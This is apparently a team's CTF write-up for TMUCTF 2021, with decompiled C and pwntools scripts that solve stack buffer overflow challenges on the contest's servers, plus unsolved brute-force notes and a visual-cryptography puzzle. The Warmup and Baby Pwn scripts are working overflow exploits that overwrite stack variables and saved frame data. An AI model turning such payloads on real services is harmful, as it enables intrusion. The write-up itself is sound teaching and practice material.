# TMUCTF 2021

## Pwn

### Warmup \[50 pts] <a href="#warmup-pwn" id="warmup-pwn"></a>

> **Description**
>
> Just a simple warmup!
>
> nc 194.5.207.56 7000, nc 185.239.107.54 7000

```c
/*
 * Decompiled main() of the Warmup binary (decompiler-generated local names).
 * Prompts for a name, reads it with gets() into a 76-byte stack buffer, and
 * runs system("cat flag.txt") if local_c is non-zero afterwards. The program
 * itself only ever stores 0 in local_c.
 */
int main() {
  char local_58 [76];
  /* NOTE(review): the generated names look like stack offsets (0x58, 0xc),
     which would put local_c directly after the 76-byte buffer -- confirm
     against the disassembly. */
  int local_c;
  
  /* A NULL buffer switches each stream to unbuffered I/O. */
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  tmulogo();
  puts("Welcome to TMUCTF 2021! Let us know your name: ");
  local_c = 0;
  /* gets() takes no length, so input longer than the buffer is written past
     the end of local_58. A bounded read, e.g.
     fgets(local_58, sizeof local_58, stdin), keeps the write in bounds. */
  gets(local_58);
  puts("Thanks!\n");
  /* Nothing in this function sets local_c to a non-zero value, so this branch
     is taken only when the read above has written outside local_58. */
  if (local_c != 0) {
    system("cat flag.txt");
  }
  return 0;
}
```

**Solution**

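This is the first thing you learn when opening a book on reverse engineering/pwn: a buffer overflow to reach the flag. `gets()` does not limit how much it reads, so a name longer than the 76-byte buffer spills into the adjacent `local_c`, and any non-zero value there makes the program print the flag.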

```python
from pwn import *

# Offline alternative the author left disabled: process("./warmup")
HOST, PORT = "194.5.207.56", 7000

# The decompiled main() reads into a 76-byte buffer with gets(). Assuming
# local_c sits directly after that buffer (as the decompiler's offsets
# suggest), 78 bytes fill the buffer and leave two non-zero bytes in local_c,
# which is all the `local_c != 0` check needs.
overflow = b"A" * 78

conn = remote(HOST, PORT)
banner = conn.recvuntil(b"name:")
print(banner)
conn.sendline(overflow)
conn.interactive()
```

**Flag: TMUCTF{??????}**

### Baby Pwn \[50 pts] <a href="#baby-pwn" id="baby-pwn"></a>

> **Description**
>
> Can you get the flag?
>
> nc 194.5.207.56 7010, nc 185.239.107.54 7010

**Decompiled Code**

```c
/*
 * Decompiled main() of the Baby Pwn binary. Reads a name with gets() into a
 * 28-byte stack buffer and calls helloUser(name) only if local_c equals
 * 0xcafe. The program itself only ever stores 0 in local_c.
 */
int main(void) {
  char name [28];
  /* NOTE(review): presumably placed directly after name in the frame, as in
     the Warmup binary -- confirm against the disassembly. */
  int local_c;
  
  /* A NULL buffer switches each stream to unbuffered I/O. */
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  tmulogo();
  local_c = 0;
  puts("Hi, Please enter your name: ");
  /* gets() takes no length, so input longer than the buffer is written past
     the end of name. fgets(name, sizeof name, stdin) would bound the read. */
  gets(name);
  /* Nothing in this function assigns 0xcafe, so the call below happens only
     when the read above has written outside name. */
  if (local_c == 0xcafe) {
    helloUser(name);
  }
  return 0;
}
```

```c
/*
 * Decompiled helloUser(): greets the caller-supplied name, then reads a second
 * line with gets() into a 128-byte stack buffer. param_1 is printed with %s,
 * so it is used as a C string even though the decompiler typed it undefined8.
 */
void helloUser(undefined8 param_1) {
  char local_88 [128];
  
  /* The name is passed as an argument to a fixed format string. */
  printf("Nice to meet you %s!\n",param_1);
  puts("Tell me about yourself ;;)");
  /* Second unbounded read. No other local is declared after local_88, so
     bytes written past its 128 bytes land on the function's saved frame data.
     NOTE(review): the exact layout, and whether the build has a stack
     protector, are not visible in this listing. A bounded read such as
     fgets(local_88, sizeof local_88, stdin) is the fix. */
  gets(local_88);
  puts("It was a pleasure meeting you.");
  return;
}
```

\
**Solution**

This is a common warmup problem that appears in CTFs, so I went through it easily. Well, sort of. I grabbed some past code and found in the source what I needed to do. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong; a simple fix was all it took. The code is below.

```python
from pwn import *
import time

# Value main() compares local_c against before it calls helloUser().
magic = 0xcafe
# Address written over helloUser()'s saved frame data. The page does not show
# what lives here -- presumably the flag-printing routine; this is the value
# the write-up says was wrong at first.
flag_os = 0x4012f0

# Filler sized to the two stack buffers in the decompiled code:
# name[28] in main() and local_88[128] in helloUser().
name_fill = b"A" * 28
about_fill = b"A" * 128
# Not used below; left over from the author's template.
newline = b"\n"

# Offline alternative the author left disabled: process("./babypwn")
conn = remote("194.5.207.56", 7010)

# Stage 1: 28 bytes fill name, then the packed 0xcafe lands on local_c
# (assuming local_c directly follows name in the frame).
print(conn.recvuntil(b"name:"))
stage_one = name_fill + p64(magic)
conn.sendline(stage_one)

# helloUser() has been entered once its ";;)" prompt arrives.
print(conn.recvuntil(b")"))

# Stage 2: 128 bytes fill local_88; the two 8-byte copies of flag_os cover the
# next 16 bytes of the frame. This only works because the read is unbounded
# and, apparently, nothing checks the frame before helloUser() returns.
stage_two = about_fill + p64(flag_os) + p64(flag_os)
conn.sendline(stage_two)
conn.interactive()
```

**Flag: TMUCTF{??????}**

### Are you admin \[198 pts] \[Not Solved] <a href="#are-you-admin" id="are-you-admin"></a>

> **Description**
>
> Just admin can get the flag! Note that the admin likes integers!
>
> nc 194.5.207.113 7020, nc 185.97.117.19 7020

```c
/*
 * Decompiled main() of the "Are you admin" binary. Reads a username and a
 * password with gets(), then prints the first line of flag.txt only if both
 * strcmp() checks pass and five equations over num1..num5 hold.
 * num1..num5 are set to 0 and never assigned from input by this code, so with
 * intact memory the equations cannot hold (0 + 0 * 0 != 0x253f).
 */
int main(void) {
  int iVar1;
  char local_128 [128];
  char password [64];
  char user [64];
  FILE *local_28;
  int num1;
  int num2;
  int num3;
  int num4;
  int num5;
  
  /* A NULL buffer switches each stream to unbuffered I/O. */
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  tmulogo();
  num5 = 0;
  num4 = 0;
  num3 = 0;
  num2 = 0;
  num1 = 0;
  /* Both reads below are unbounded: input longer than 63 characters plus the
     terminating NUL is written past the 64-byte array into whatever the frame
     stores next.
     NOTE(review): the declaration order suggests the FILE pointer and
     num1..num5 are among those neighbours -- confirm the layout in the
     disassembly. Bounded reads (fgets with sizeof) remove the problem. */
  puts("Enter username:");
  gets(user);
  puts("Enter password:");
  gets(password);
  /* The expected credentials are string constants in the binary, so anyone
     who can read or decompile it learns them. */
  iVar1 = strcmp(user,"AlexTheUser");
  if ((((iVar1 == 0) && (iVar1 = strcmp(password,"4l3x7h3p455w0rd"), iVar1 == 0)) &&
      (num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
    local_28 = fopen("flag.txt","r");
    if (local_28 == (FILE *)0x0) {
      printf("Missing flag.txt. Contact an admin if you see this on remote.");
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    /* Bounded read: 0x80 equals the size of local_128. */
    fgets(local_128,0x80,local_28);
    /* The flag is passed as data to a fixed "%s" format. */
    printf("%s",local_128);
  }
  return 0;
}
```

**Solution**

```python
from pwn import *


# Credentials as they appear in the strcmp() calls of the decompiled main().
user = b"AlexTheUser"
password = b"4l3x7h3p455w0rd"

# Earlier experiments the author left disabled:
#   print(len(p64(flag_address)))
#   binary = process("./areyouadmin")
#   binary.close()
conn = remote("194.5.207.113", 7020)

# Answer each prompt in turn, echoing what the service sent.
# Correct credentials alone do not pass the check: main() also requires the
# five num* equations, and those values are all still 0 on this path.
for prompt, answer in ((b"username:", user), (b"password:", password)):
    print(conn.recvuntil(prompt))
    conn.sendline(answer)

# Also disabled by the author:
#   binary.sendline(payload + p64(flag_address))
#   binary.interactive()
conn.close()
print("made it to the numbers")

# Everything below is scratch work wrapped in bare triple-quoted strings, so
# none of it executes.
#
# First attempt (disabled): derive i1, i4 and i5 from guessed i2/i3 using three
# of the equations, then test the remaining two. As written it would not be
# usable if enabled: `found` is never set, so `while not found` never ends, and
# `/` is true division, so i4 and i5 become floats although the challenge hint
# asks for integers.
"""
top = 233
found = False
i1 = 0
i4 = 0
i5 = 0
while not found:
	for i2 in range(100, top):
		for i3 in range(100, top):
			i1 = (-1 * i3 * i2) + 0x16d3
			i4 = (0x37a2 - i2) / i3
			# Using New Known
			i5 = (0x253f - i3) / i4
			if (i5 + i2 * i1) == 0x1bc9:
				print(i1, i2, i3, i4, i5)
			if (i4 + i1 * i5) == 0x703f:
				print(i1, i2, i3, i4, i5)
				

				
"""		
# 233 30 187 76 123
# Read as num1..num5, these five values satisfy all five equations listed at
# the end of this script.

# The condition from the decompiled main(), without the two strcmp() checks.
"""
  if (((num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
"""
# Second attempt (disabled): nested brute force over narrow hand-picked ranges,
# with the hexadecimal constants written in decimal.
"""
top = 100
for i1 in range(0 , 100):
	print(i1)
	for i2 in range(0 , 10000):
		for i3 in range(28, 32):
			for i4 in range(90, 100):
				for i5 in range(90, 100):
					if (i3 + i5 * i4 == 9535):
						if(i2 + i4 * i3 == 14242):
							print(i2, i3, i4)
							if(i1 + i3 * i2 == 5843):
								if (i5 + i2 * i1 == 7113):
									if (i4 + i1 * i5 == 28735):
										print(i1, i2, i3, i4, i5)
										
"""
# Original Guess = 9535 14242 5843 7113 28735
# (the decimal forms of 0x253f, 0x37a2, 0x16d3, 0x1bc9 and 0x703f)

# The five equations main() checks. The decompiled code sets num1..num5 to 0
# and never assigns them from input, so the check depends on values the program
# has no legitimate way to set; the unbounded gets() calls are the defect to fix.
#num1 + num3 * num2 == 0x16d3
#num3 + num5 * num4 == 0x253f
#num2 + num4 * num3 == 0x37a2
#num5 + num2 * num1 == 0x1bc9
#num4 + num1 * num5 == 0x703f
```

## Welcome

### Warmup \[50 pts] <a href="#warmup" id="warmup"></a>

> **Description**
>
> A fun visual cryptography tool will amaze your kids!
>
> Note: Remember the flag format is TMUCTF{...}.

{% file src="/files/-Mjl2EkN0KSwgWFemCVN" %}
Image1
{% endfile %}

{% file src="/files/-Mjl2Z5yMCcgNviNEtS8" %}
Image2
{% endfile %}

**Solution**

Notice a small difference in the two file sizes. I was like hmmm, let me see what would happen if I combine the images. I overlaid one on top of the other and got the final image of the flag.

![](/files/-Mjl2H9ZTzdh3bCXyBBc)

**Flag: TMUCTF{W3\_h0p3\_y0u\_3nj0y\_7h15\_c0mp371710n\_4nd\_7h4nk\_y0u!}**


